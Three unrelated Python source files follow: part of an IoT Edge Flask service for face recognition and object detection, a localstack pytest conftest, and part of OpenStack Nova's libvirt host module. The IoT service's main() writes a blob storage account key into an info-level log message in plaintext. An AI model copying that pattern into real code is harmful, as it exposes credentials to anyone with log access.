        cvimg = cv2.cvtColor(cvimg, cv2.COLOR_RGBA2BGRA)
    return cvimg
def cv2pil(image):
    """Convert an OpenCV ndarray (grayscale/BGR/BGRA) to a PIL image.

    Bugfix: the 4-channel branch tested ``pilImage.shape[2]``, but
    ``pilImage`` is only bound after the conversion — any BGRA input
    raised NameError. The test must use ``img``.
    """
    img = image.copy()
    if img.ndim == 2:
        pass  # grayscale: no channel reordering needed
    elif img.shape[2] == 3:
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    elif img.shape[2] == 4:
        img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
    pilImage = Image.fromarray(img)
    return pilImage
async def main():
    """Entry point: configure the uploader and models from environment
    variables (IoT Edge) or CLI arguments (device-app/test mode),
    register twin handling, and serve the inference HTTP endpoints.

    Bugfix: the blob-storage guard ended with the bare truthy string
    'BLOB_CONTAINER_NAME' instead of a membership test, so a missing
    BLOB_CONTAINER_NAME env var raised KeyError instead of skipping
    the uploader.
    """
    args = None
    iotClient = None
    IOTEDGE_DEVICEID = None
    if 'IOTEDGE_DEVICEID' in os.environ:
        IOTEDGE_DEVICEID=os.environ['IOTEDGE_DEVICEID']
    else:
        args = build_argparser().parse_args()
    fileUploader = None
    if 'BLOB_ON_EDGE_MODULE' in os.environ and 'BLOB_ON_EDGE_ACCOUNT_NAME' in os.environ and 'BLOB_ON_EDGE_ACCOUNT_KEY' in os.environ and 'BLOB_CONTAINER_NAME' in os.environ:
        BLOB_ON_EDGE_MODULE = os.environ['BLOB_ON_EDGE_MODULE']
        BLOB_ON_EDGE_ACCOUNT_NAME = os.environ['BLOB_ON_EDGE_ACCOUNT_NAME']
        BLOB_ON_EDGE_ACCOUNT_KEY = os.environ['BLOB_ON_EDGE_ACCOUNT_KEY']
        BLOB_CONTAINER_NAME = os.environ['BLOB_CONTAINER_NAME']
        logging.info(f'Blob Service specified. BLOB_ON_EDGE_MODULE={BLOB_ON_EDGE_MODULE},BLOB_ON_EDGE_ACCOUNT_NAME={BLOB_ON_EDGE_ACCOUNT_NAME},BLOB_ON_EDGE_ACCOUNT_KEY={BLOB_ON_EDGE_ACCOUNT_KEY},BLOB_CONTAINER_NAME={BLOB_CONTAINER_NAME}')
        fileUploader = FileUploader(BLOB_ON_EDGE_MODULE, BLOB_ON_EDGE_ACCOUNT_NAME, BLOB_ON_EDGE_ACCOUNT_KEY, BLOB_CONTAINER_NAME)
        fileUploader.initialize()
        logging.info('FileUploader initialized.')
    # each setting below prefers the environment variable, then the CLI
    # argument, then (for the output paths) an IoT-Edge default
    global FACEDB_FOLDER_NAME
    if 'FACEDB_FOLDER_NAME' in os.environ:
        FACEDB_FOLDER_NAME = os.environ['FACEDB_FOLDER_NAME']
    else:
        if args:
            FACEDB_FOLDER_NAME = args.pg
    logging.info(f'Face DB Folder - {FACEDB_FOLDER_NAME}')
    OPENVINO_DEVICE = None
    if 'OPENVINO_DEVICE' in os.environ:
        OPENVINO_DEVICE = os.environ['OPENVINO_DEVICE']
    else:
        if args:
            OPENVINO_DEVICE = args.device
    logging.info((f'OpenVino Device - {OPENVINO_DEVICE}'))
    MSG_OUTPUT_PATH_OD = None
    if 'MSG_OUTPUT_PATH_OD' in os.environ:
        MSG_OUTPUT_PATH_OD = os.environ['MSG_OUTPUT_PATH_OD']
    else:
        if args:
            MSG_OUTPUT_PATH_OD = args.output_path_od
        else:
            if IOTEDGE_DEVICEID:
                MSG_OUTPUT_PATH_OD = 'output_od'
    MSG_OUTPUT_PATH_FR = None
    if 'MSG_OUTPUT_PATH_FR' in os.environ:
        MSG_OUTPUT_PATH_FR = os.environ['MSG_OUTPUT_PATH_FR']
    else:
        if args:
            MSG_OUTPUT_PATH_FR = args.output_path_fr
        else:
            if IOTEDGE_DEVICEID:
                MSG_OUTPUT_PATH_FR = 'output_fr'
    logging.info(f'IoT Edge Module Output Path - OD:{MSG_OUTPUT_PATH_OD},FR:{MSG_OUTPUT_PATH_FR}')
    iotDeviceCS = None
    if args:
        iotDeviceCS = args.connection_string
        logging.info(f'IoT Device App Mode : {iotDeviceCS}')
    else:
        if IOTEDGE_DEVICEID:
            logging.info(f'IoT Edge Model Mode : {IOTEDGE_DEVICEID}')
    app = Flask(__name__)
    logging.info('Initialize Infarence Engine...')
    ie = IECore()
    objectDetector = ObjectDetector(ie, OPENVINO_DEVICE)
    faceRecognizer = FaceRecognizer(ie, OPENVINO_DEVICE, FACEDB_FOLDER_NAME)
    configLock = threading.Lock()
    iotClient = setup_iot(IOTEDGE_DEVICEID, objectDetector, faceRecognizer, configLock, iotDeviceCS)
    if args:
        # CLI mode: synthesize a desired-properties document from the
        # arguments and load the models immediately
        if args.od_url and args.od_filename and args.od_name and args.od_label and args.od_architecture_type and args.fr_url and args.fr_filename and args.fr_fd_name and args.fr_lm_name and args.fr_reid_name :
            configSpec = {
                'send-telemetry': False,
                'upload' : { 'interval-sec': 60, 'inference-mark': args.inference_mask },
                'model-od' : {
                    'url': args.od_url,
                    'filename': args.od_filename,
                    'name': args.od_name,
                    'label': args.od_label,
                    'architecture-type': args.od_architecture_type
                },
                'model-fr': {
                    'url': args.fr_url,
                    'filename': args.fr_filename,
                    'fd-name': args.fr_fd_name,
                    'lm-name': args.fr_lm_name,
                    'reid-name': args.fr_reid_name
                }
            }
            parse_desired_properties_request(iotClient, configSpec, objectDetector, faceRecognizer, configLock)
    if fileUploader and iotClient:
        update_reported_properties_of_ipaddress(iotClient, fileUploader.gethostname())

    @app.route("/facerecognition", methods = ['POST'])
    async def facerecognition():
        """Run face recognition on the POSTed JPEG and return inferences."""
        try:
            global intervalSec, inferenceMark, sendDetection
            logging.info('received recognition request')
            imageData = io.BytesIO(request.get_data())
            pilImage = Image.open((imageData))
            frame = pil2cv(pilImage)
            logging.info('Recognizing...')
            # lock: recognition must not race a concurrent model reload
            configLock.acquire()
            nowTime = datetime.datetime.now()
            timeDelta = nowTime - faceRecognizer.GetScoredTime()
            logging.info(f'process time - now={nowTime}, scored time={faceRecognizer.GetScoredTime()}')
            detectedObjects, output_frame = faceRecognizer.Process(frame, inferenceMark)
            isSendTelemetry = sendDetection
            configLock.release()
            logging.info('Recognized.')
            if isSendTelemetry:
                telemetry = {'timestamp':'{0:%Y-%m-%dT%H:%M:%S.%fZ}'.format(nowTime), 'face-recognition': detectedObjects }
                sendMsg = json.dumps(telemetry)
                iotClient.send_message(sendMsg, MSG_OUTPUT_PATH_FR)
                logging.info('Send detection message to face_recognition_monitor of IoT Edge Runtime')
            if len(detectedObjects) > 0 :
                logging.info(f'check time - timeDelta.seconds={timeDelta.seconds}')
                # throttle uploads: at most one snapshot per intervalSec
                if timeDelta.seconds > intervalSec:
                    logging.info('scored long again.')
                    if fileUploader:
                        imageData = None
                        if inferenceMark:
                            pilImage = cv2pil(output_frame)
                            imageData = io.BytesIO()
                            pilImage.save(imageData,'JPEG')
                            imageData = imageData.getvalue()
                        else:
                            imageData = io.BytesIO(request.get_data())
                        fileUploader.upload(imageData, IOTEDGE_DEVICEID, '{0:%Y%m%d%H%M%S%f}'.format(nowTime), 'jpg')
                respBody = {
                    'inferences' : detectedObjects
                }
                respBody = json.dumps(respBody)
                logging.info(f'Sending response - {respBody}')
                return Response(respBody, status=200, mimetype='application/json')
            else :
                logging.info('Sending empty response')
                return Response(status=204)
        except Exception as e:
            # never leave the lock held after a mid-processing failure
            if configLock.locked():
                configLock.release()
            logging.error(f'exception - {e}')
            return Response(response='Exception occured while processing face recognition of the image.', status=500)

    @app.route("/objectdetection", methods = ['POST'])
    async def objectdetection():
        """Run object detection on the POSTed JPEG and return inferences."""
        try:
            global intervalSec, inferenceMark, sendDetection
            logging.info('received request')
            imageData = io.BytesIO(request.get_data())
            pilImage = Image.open((imageData))
            frame = pil2cv(pilImage)
            logging.info('Scoring...')
            # lock: scoring must not race a concurrent model reload
            configLock.acquire()
            nowTime = datetime.datetime.now()
            timeDelta = nowTime - objectDetector.GetScoredTime()
            detectedObjects, output_frame = objectDetector.Score(frame, inferenceMark)
            isSendTelemetry = sendDetection
            configLock.release()
            logging.info('Scored.')
            if isSendTelemetry and len(detectedObjects)>0:
                # aggregate per-label counts for the telemetry message
                totalDtected = 0
                detected = {}
                for d in detectedObjects:
                    label = d['entity']['tag']['value']
                    if label in detected:
                        detected[label] = detected[label] + 1
                    else:
                        detected[label] = 1
                    totalDtected = totalDtected + 1
                telemetry = {'timestamp':'{0:%Y-%m-%dT%H:%M:%S.%fZ}'.format(nowTime), 'totaldetection': totalDtected, 'detected':detected, 'detectedObjects':detectedObjects }
                sendMsg = json.dumps(telemetry)
                iotClient.send_message(sendMsg, MSG_OUTPUT_PATH_OD)
                logging.info('Send detection message to detection_monitor of IoT Edge Runtime')
            if len(detectedObjects) > 0 :
                # throttle uploads: at most one snapshot per intervalSec
                if timeDelta.seconds > intervalSec:
                    logging.info('scored long again.')
                    if fileUploader:
                        imageData = None
                        if inferenceMark:
                            pilImage = cv2pil(output_frame)
                            imageData = io.BytesIO()
                            pilImage.save(imageData,'JPEG')
                            imageData = imageData.getvalue()
                        else:
                            imageData = io.BytesIO(request.get_data())
                        fileUploader.upload(imageData, IOTEDGE_DEVICEID, '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now()), 'jpg')
                respBody = {
                    'inferences' : detectedObjects
                }
                respBody = json.dumps(respBody)
                logging.info(f'Sending response - {respBody}')
                return Response(respBody, status=200, mimetype='application/json')
            else :
                logging.info('Sending empty response')
                return Response(status=204)
        except Exception as e:
            # never leave the lock held after a mid-processing failure
            if configLock.locked():
                configLock.release()
            logging.error(f'exception - {e}')
            return Response(response='Exception occured while processing object detection of the image.', status=500)

    @app.route("/")
    def healty():
        """Liveness probe endpoint."""
        return "Healthy"

    app.run(host='0.0.0.0', port=8888)
if __name__ == "__main__":
    # Drive the async main() to completion, then release the loop.
    event_loop = asyncio.get_event_loop()
    event_loop.run_until_complete(main())
    event_loop.close()
|
conftest.py
|
"""
Pytest configuration that spins up a single localstack instance that is shared across test modules.
See: https://docs.pytest.org/en/6.2.x/fixture.html#conftest-py-sharing-fixtures-across-multiple-files
It is thread/process safe to run with pytest-parallel, however not for pytest-xdist.
"""
import logging
import multiprocessing as mp
import os
import threading
import pytest
from localstack import config
from localstack.config import is_env_true
from localstack.constants import ENV_INTERNAL_TEST_RUN
from localstack.services import infra
from localstack.utils.analytics.profiler import profiled
from localstack.utils.common import safe_requests
from tests.integration.test_elasticsearch import ElasticsearchTest
from tests.integration.test_terraform import TestTerraform
logger = logging.getLogger(__name__)
# Inter-process events coordinating the single shared localstack
# instance (mp.Event so pytest-parallel workers observe the same state).
localstack_started = mp.Event()  # set once localstack is up (or skipped)
localstack_stop = mp.Event()  # request: shut localstack down
localstack_stopped = mp.Event()  # set once localstack has fully stopped
startup_monitor_event = mp.Event()  # request: start localstack
# collection of functions that should be executed to initialize tests
test_init_functions = set()
@pytest.hookimpl()
def pytest_configure(config):
    # first pytest lifecycle hook: spin up the monitor thread that will
    # launch localstack once startup_monitor_event is set
    _start_monitor()
def pytest_runtestloop(session):
    """Second pytest lifecycle hook (runs before the test runner starts).

    Scans the collected test classes to register expensive one-off
    initializers (terraform, elasticsearch), then signals the startup
    monitor and blocks until localstack reports ready.
    """
    # collect test classes
    test_classes = set()
    for item in session.items:
        if item.parent and item.parent.cls:
            test_classes.add(item.parent.cls)
    # add init functions for certain tests that download/install things
    for test_class in test_classes:
        # set flag that terraform will be used
        if TestTerraform is test_class:
            logger.info("will initialize TestTerraform")
            test_init_functions.add(TestTerraform.init_async)
            continue
        if ElasticsearchTest is test_class:
            logger.info("will initialize ElasticsearchTest")
            test_init_functions.add(ElasticsearchTest.init_async)
            continue
    # nothing to run (or collect-only mode): don't start localstack
    if not session.items:
        return
    if session.config.option.collectonly:
        return
    # trigger localstack startup in startup_monitor and wait until it becomes ready
    startup_monitor_event.set()
    localstack_started.wait()
@pytest.hookimpl()
def pytest_unconfigure(config):
    # last pytest lifecycle hook (before pytest exits): request shutdown
    # of the shared localstack instance
    _trigger_stop()
def _start_monitor():
    """Run startup_monitor() on a background thread."""
    monitor_thread = threading.Thread(target=startup_monitor)
    monitor_thread.start()
def _trigger_stop():
    """Request localstack shutdown and unblock the startup monitor.

    Setting startup_monitor_event as well ensures the monitor thread
    wakes up even if no test ever requested a start.
    """
    localstack_stop.set()
    startup_monitor_event.set()
def startup_monitor() -> None:
    """
    The startup monitor is a thread that waits for the startup_monitor_event and, once the event is true, starts a
    localstack instance in its own thread context.
    """
    logger.info("waiting on localstack_start signal")
    startup_monitor_event.wait()
    if localstack_stop.is_set():
        # this is called if _trigger_stop() is called before any test has requested the localstack_runtime fixture.
        logger.info("ending startup_monitor")
        localstack_stopped.set()
        return
    if is_env_true("TEST_SKIP_LOCALSTACK_START"):
        logger.info("TEST_SKIP_LOCALSTACK_START is set, not starting localstack")
        # report "started" so waiting tests unblock against an external instance
        localstack_started.set()
        return
    logger.info("running localstack")
    # blocks until localstack terminates (see run_localstack docstring)
    run_localstack()
def run_localstack():
    """
    Start localstack and block until it terminates. Terminate localstack by calling _trigger_stop().
    """
    # configure
    os.environ[ENV_INTERNAL_TEST_RUN] = "1"
    safe_requests.verify_ssl = False
    config.FORCE_SHUTDOWN = False
    config.EDGE_BIND_HOST = "0.0.0.0"

    def watchdog():
        # waits for the stop request, then tears the infra down
        logger.info("waiting stop event")
        localstack_stop.wait()  # triggered by _trigger_stop()
        logger.info("stopping infra")
        infra.stop_infra()

    def start_profiling(*args):
        # optional profiler that covers the whole test session
        if not config.USE_PROFILER:
            return

        @profiled()
        def profile_func():
            # keep profiler active until tests have finished
            localstack_stopped.wait()

        print("Start profiling...")
        profile_func()
        print("Done profiling...")

    monitor = threading.Thread(target=watchdog)
    monitor.start()
    logger.info("starting localstack infrastructure")
    infra.start_infra(asynchronous=True)
    threading.Thread(target=start_profiling).start()
    for fn in test_init_functions:
        try:
            # asynchronous init functions
            fn()
        except Exception:
            logger.exception("exception while running init function for test")
    logger.info("waiting for infra to be ready")
    infra.INFRA_READY.wait()  # wait for infra to start (threading event)
    localstack_started.set()  # set conftest inter-process Event
    logger.info("waiting for shutdown")
    try:
        logger.info("waiting for watchdog to join")
        monitor.join()
    finally:
        logger.info("ok bye")
        # always signal full stop so profiler/waiters can finish
        localstack_stopped.set()
@pytest.fixture(scope="session", autouse=True)
def localstack_runtime():
    """
    This is a dummy fixture. Each test requests the fixture, but it actually just makes sure that localstack is running,
    blocks until localstack is running, or starts localstack the first time the fixture is requested.
    It doesn't actually do anything but signal to the `startup_monitor` function.
    """
    if localstack_started.is_set():
        # called by all tests after the startup has completed and the initial tests are unblocked
        yield
        return
    # first caller: request startup and block until localstack is ready
    startup_monitor_event.set()
    localstack_started.wait()
    yield
    return
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
# libvirt is imported lazily in Host.__init__ so this module can be
# imported on systems without the libvirt python bindings.
libvirt = None
LOG = logging.getLogger(__name__)
# eventlet-unpatched primitives: the native libvirt event thread must
# not use green (monkey-patched) socket/threading/queue implementations
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("queue" if six.PY3 else "Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
    """Information about libvirt background jobs

    This class encapsulates information about libvirt
    background jobs. It provides a mapping from either
    the old virDomainGetJobInfo API which returned a
    fixed list of fields, or the modern virDomainGetJobStats
    which returns an extendable dict of fields.
    """

    # class-level flag: flipped to False permanently once either the
    # remote libvirtd or the local binding lacks virDomainGetJobStats
    _have_job_stats = True

    def __init__(self, **kwargs):
        # every field defaults to 0 so callers can read stats that the
        # older compat API does not populate
        self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
        self.time_elapsed = kwargs.get("time_elapsed", 0)
        self.time_remaining = kwargs.get("time_remaining", 0)
        self.downtime = kwargs.get("downtime", 0)
        self.setup_time = kwargs.get("setup_time", 0)
        self.data_total = kwargs.get("data_total", 0)
        self.data_processed = kwargs.get("data_processed", 0)
        self.data_remaining = kwargs.get("data_remaining", 0)
        self.memory_total = kwargs.get("memory_total", 0)
        self.memory_processed = kwargs.get("memory_processed", 0)
        self.memory_remaining = kwargs.get("memory_remaining", 0)
        self.memory_constant = kwargs.get("memory_constant", 0)
        self.memory_normal = kwargs.get("memory_normal", 0)
        self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
        self.memory_bps = kwargs.get("memory_bps", 0)
        self.disk_total = kwargs.get("disk_total", 0)
        self.disk_processed = kwargs.get("disk_processed", 0)
        self.disk_remaining = kwargs.get("disk_remaining", 0)
        self.disk_bps = kwargs.get("disk_bps", 0)
        self.comp_cache = kwargs.get("compression_cache", 0)
        self.comp_bytes = kwargs.get("compression_bytes", 0)
        self.comp_pages = kwargs.get("compression_pages", 0)
        self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
        self.comp_overflow = kwargs.get("compression_overflow", 0)

    @classmethod
    def _get_job_stats_compat(cls, dom):
        # Make the old virDomainGetJobInfo method look similar to the
        # modern virDomainGetJobStats method
        try:
            info = dom.jobInfo()
        except libvirt.libvirtError as ex:
            # When migration of a transient guest completes, the guest
            # goes away so we'll see NO_DOMAIN error code
            #
            # When migration of a persistent guest completes, the guest
            # merely shuts off, but libvirt unhelpfully raises an
            # OPERATION_INVALID error code
            #
            # Lets pretend both of these mean success
            if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
                                       libvirt.VIR_ERR_OPERATION_INVALID):
                LOG.debug("Domain has shutdown/gone away: %s", ex)
                return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
            else:
                LOG.debug("Failed to get job info: %s", ex)
                raise
        # positional fields of the legacy jobInfo() tuple
        return cls(
            type=info[0],
            time_elapsed=info[1],
            time_remaining=info[2],
            data_total=info[3],
            data_processed=info[4],
            data_remaining=info[5],
            memory_total=info[6],
            memory_processed=info[7],
            memory_remaining=info[8],
            disk_total=info[9],
            disk_processed=info[10],
            disk_remaining=info[11])

    @classmethod
    def for_domain(cls, dom):
        '''Get job info for the domain

        Query the libvirt job info for the domain (ie progress
        of migration, or snapshot operation)

        Returns: a DomainJobInfo instance
        '''
        if cls._have_job_stats:
            try:
                stats = dom.jobStats()
                return cls(**stats)
            except libvirt.libvirtError as ex:
                if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
                    # Remote libvirt doesn't support new API
                    LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
                    cls._have_job_stats = False
                    return cls._get_job_stats_compat(dom)
                elif ex.get_error_code() in (
                        libvirt.VIR_ERR_NO_DOMAIN,
                        libvirt.VIR_ERR_OPERATION_INVALID):
                    # Transient guest finished migration, so it has gone
                    # away completely
                    LOG.debug("Domain has shutdown/gone away: %s", ex)
                    return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
                else:
                    LOG.debug("Failed to get job stats: %s", ex)
                    raise
            except AttributeError as ex:
                # Local python binding doesn't support new API
                LOG.debug("Missing local virDomainGetJobStats: %s", ex)
                cls._have_job_stats = False
                return cls._get_job_stats_compat(dom)
        else:
            return cls._get_job_stats_compat(dom)
class Host(object):
    """Encapsulates a connection to a libvirt hypervisor.

    Responsibilities visible in this class:

    * lazily open (and transparently re-open) the libvirt connection,
      notifying ``conn_event_handler`` when connectivity changes;
    * run the libvirt default event loop in a native thread and forward
      domain lifecycle events to ``lifecycle_event_handler`` through a
      green thread (eventlet);
    * convenience wrappers around common virConnect operations: domain
      lookup and listing, host capabilities, secrets, hardware info.
    """

    def __init__(self, uri, read_only=False,
                 conn_event_handler=None,
                 lifecycle_event_handler=None):
        # libvirt is imported lazily so this module can be imported even
        # where the libvirt python binding is not installed.
        global libvirt
        if libvirt is None:
            libvirt = importutils.import_module('libvirt')
        self._uri = uri
        self._read_only = read_only
        self._conn_event_handler = conn_event_handler
        self._lifecycle_event_handler = lifecycle_event_handler
        # Flipped to True once the bulk listAllDomains API has failed,
        # so we permanently fall back to the slow per-domain path.
        self._skip_list_all_domains = False
        self._caps = None          # cached LibvirtConfigCaps
        self._hostname = None      # cached hypervisor hostname
        self._wrapped_conn = None
        self._wrapped_conn_lock = threading.Lock()
        self._event_queue = None
        # Maps instance uuid -> pending delayed-STOPPED greenthread.
        self._events_delayed = {}
        # Note(toabctl): During a reboot of a domain, STOPPED and
        #                STARTED events are sent. To prevent shutting
        #                down the domain during a reboot, delay the
        #                STOPPED lifecycle event some seconds.
        self._lifecycle_delay = 15

    def _native_thread(self):
        """Receives async events coming in from libvirtd.

        This is a native thread which runs the default
        libvirt event loop implementation. This processes
        any incoming async events from libvirtd and queues
        them for later dispatch. This thread is only
        permitted to use libvirt python APIs, and the
        driver.queue_event method. In particular any use
        of logging is forbidden, since it will confuse
        eventlet's greenthread integration
        """
        while True:
            libvirt.virEventRunDefaultImpl()

    def _dispatch_thread(self):
        """Dispatches async events coming in from libvirtd.

        This is a green thread which waits for events to
        arrive from the libvirt event loop thread. This
        then dispatches the events to the compute manager.
        """
        while True:
            self._dispatch_events()

    @staticmethod
    def _event_lifecycle_callback(conn, dom, event, detail, opaque):
        """Receives lifecycle events from libvirt.

        NB: this method is executing in a native thread, not
        an eventlet coroutine. It can only invoke other libvirt
        APIs, or use self._queue_event(). Any use of logging APIs
        in particular is forbidden.
        """
        # `opaque` is the Host instance registered in
        # _get_new_connection(); recover it here.
        self = opaque
        uuid = dom.UUIDString()
        transition = None
        if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
            transition = virtevent.EVENT_LIFECYCLE_STOPPED
        elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
            transition = virtevent.EVENT_LIFECYCLE_STARTED
        elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
            transition = virtevent.EVENT_LIFECYCLE_PAUSED
        elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
            transition = virtevent.EVENT_LIFECYCLE_RESUMED
        # Events other than the four above are deliberately ignored.
        if transition is not None:
            self._queue_event(virtevent.LifecycleEvent(uuid, transition))

    def _close_callback(self, conn, reason, opaque):
        # Queue a "connection closed" notification; it is recognised in
        # _dispatch_events() by its 'conn'/'reason' keys.
        close_info = {'conn': conn, 'reason': reason}
        self._queue_event(close_info)

    @staticmethod
    def _test_connection(conn):
        # Probe connection liveness with a cheap API call. RPC/system
        # errors from the remote side mean the connection has broken
        # and should be re-established; anything else is re-raised.
        try:
            conn.getLibVersion()
            return True
        except libvirt.libvirtError as e:
            if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
                                       libvirt.VIR_ERR_INTERNAL_ERROR) and
                e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
                                         libvirt.VIR_FROM_RPC)):
                LOG.debug('Connection to libvirt broke')
                return False
            raise

    @staticmethod
    def _connect_auth_cb(creds, opaque):
        # Refuse any interactive credential request: we only support
        # non-interactive authentication (e.g. SASL config, TLS certs).
        if len(creds) == 0:
            return 0
        raise exception.NovaException(
            _("Can not handle authentication request for %d credentials")
            % len(creds))

    @staticmethod
    def _connect(uri, read_only):
        """Open a libvirt connection to *uri* via a native thread."""
        auth = [[libvirt.VIR_CRED_AUTHNAME,
                 libvirt.VIR_CRED_ECHOPROMPT,
                 libvirt.VIR_CRED_REALM,
                 libvirt.VIR_CRED_PASSPHRASE,
                 libvirt.VIR_CRED_NOECHOPROMPT,
                 libvirt.VIR_CRED_EXTERNAL],
                Host._connect_auth_cb,
                None]

        flags = 0
        if read_only:
            flags = libvirt.VIR_CONNECT_RO
        # tpool.proxy_call creates a native thread. Due to limitations
        # with eventlet locking we cannot use the logging API inside
        # the called function.
        return tpool.proxy_call(
            (libvirt.virDomain, libvirt.virConnect),
            libvirt.openAuth, uri, auth, flags)

    def _queue_event(self, event):
        """Puts an event on the queue for dispatch.

        This method is called by the native event thread to
        put events on the queue for later dispatch by the
        green thread. Any use of logging APIs is forbidden.
        """
        if self._event_queue is None:
            return

        # Queue the event...
        self._event_queue.put(event)

        # ...then wakeup the green thread to dispatch it
        c = ' '.encode()
        self._event_notify_send.write(c)
        self._event_notify_send.flush()

    def _dispatch_events(self):
        """Wait for & dispatch events from native thread

        Blocks until native thread indicates some events
        are ready. Then dispatches all queued events.
        """

        # Wait to be notified that there are some
        # events pending
        try:
            _c = self._event_notify_recv.read(1)
            assert _c
        except ValueError:
            return  # will be raised when pipe is closed

        # Process as many events as possible without
        # blocking
        last_close_event = None
        while not self._event_queue.empty():
            try:
                event = self._event_queue.get(block=False)
                if isinstance(event, virtevent.LifecycleEvent):
                    # call possibly with delay
                    self._event_emit_delayed(event)
                elif 'conn' in event and 'reason' in event:
                    # Only the most recent close event matters; earlier
                    # ones in the same batch are superseded.
                    last_close_event = event
            except native_Queue.Empty:
                pass
        if last_close_event is None:
            return
        conn = last_close_event['conn']
        # get_new_connection may already have disabled the host,
        # in which case _wrapped_conn is None.
        with self._wrapped_conn_lock:
            if conn == self._wrapped_conn:
                reason = str(last_close_event['reason'])
                msg = _("Connection to libvirt lost: %s") % reason
                self._wrapped_conn = None
                if self._conn_event_handler is not None:
                    self._conn_event_handler(False, msg)

    def _event_emit_delayed(self, event):
        """Emit events - possibly delayed."""
        def event_cleanup(gt, *args, **kwargs):
            """Callback function for greenthread. Called
            to cleanup the _events_delayed dictionary when a event
            was called.
            """
            event = args[0]
            self._events_delayed.pop(event.uuid, None)

        # Cleanup possible delayed stop events.
        # A newer lifecycle event for the same instance supersedes any
        # pending delayed STOPPED event (e.g. STARTED during a reboot).
        if event.uuid in self._events_delayed.keys():
            self._events_delayed[event.uuid].cancel()
            self._events_delayed.pop(event.uuid, None)
            LOG.debug("Removed pending event for %s due to "
                      "lifecycle event", event.uuid)

        if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
            # Delay STOPPED event, as they may be followed by a STARTED
            # event in case the instance is rebooting
            id_ = greenthread.spawn_after(self._lifecycle_delay,
                                          self._event_emit, event)
            self._events_delayed[event.uuid] = id_
            # add callback to cleanup self._events_delayed dict after
            # event was called
            id_.link(event_cleanup, event)
        else:
            self._event_emit(event)

    def _event_emit(self, event):
        # Hand the lifecycle event to the registered handler, if any.
        if self._lifecycle_event_handler is not None:
            self._lifecycle_event_handler(event)

    def _init_events_pipe(self):
        """Create a self-pipe for the native thread to synchronize on.

        This code is taken from the eventlet tpool module, under terms
        of the Apache License v2.0.
        """

        self._event_queue = native_Queue.Queue()
        try:
            rpipe, wpipe = os.pipe()
            self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
            self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
        except (ImportError, NotImplementedError):
            # This is Windows compatibility -- use a socket instead
            # of a pipe because pipes don't really exist on Windows.
            sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.bind(('localhost', 0))
            sock.listen(50)
            csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            csock.connect(('localhost', sock.getsockname()[1]))
            nsock, addr = sock.accept()
            self._event_notify_send = nsock.makefile('wb', 0)
            gsock = greenio.GreenSocket(csock)
            self._event_notify_recv = gsock.makefile('rb', 0)

    def _init_events(self):
        """Initializes the libvirt events subsystem.

        This requires running a native thread to provide the
        libvirt event loop integration. This forwards events
        to a green thread which does the actual dispatching.
        """

        self._init_events_pipe()

        LOG.debug("Starting native event thread")
        self._event_thread = native_threading.Thread(
            target=self._native_thread)
        self._event_thread.setDaemon(True)
        self._event_thread.start()

        LOG.debug("Starting green dispatch thread")
        utils.spawn(self._dispatch_thread)

    def _get_new_connection(self):
        # call with _wrapped_conn_lock held
        LOG.debug('Connecting to libvirt: %s', self._uri)
        wrapped_conn = None

        try:
            wrapped_conn = self._connect(self._uri, self._read_only)
        finally:
            # Enabling the compute service, in case it was disabled
            # since the connection was successful.
            disable_reason = None
            if not wrapped_conn:
                disable_reason = 'Failed to connect to libvirt'
            if self._conn_event_handler is not None:
                self._conn_event_handler(bool(wrapped_conn), disable_reason)

        self._wrapped_conn = wrapped_conn

        # Event registration is best-effort: an old or limited libvirt
        # is logged and tolerated, not treated as a connection failure.
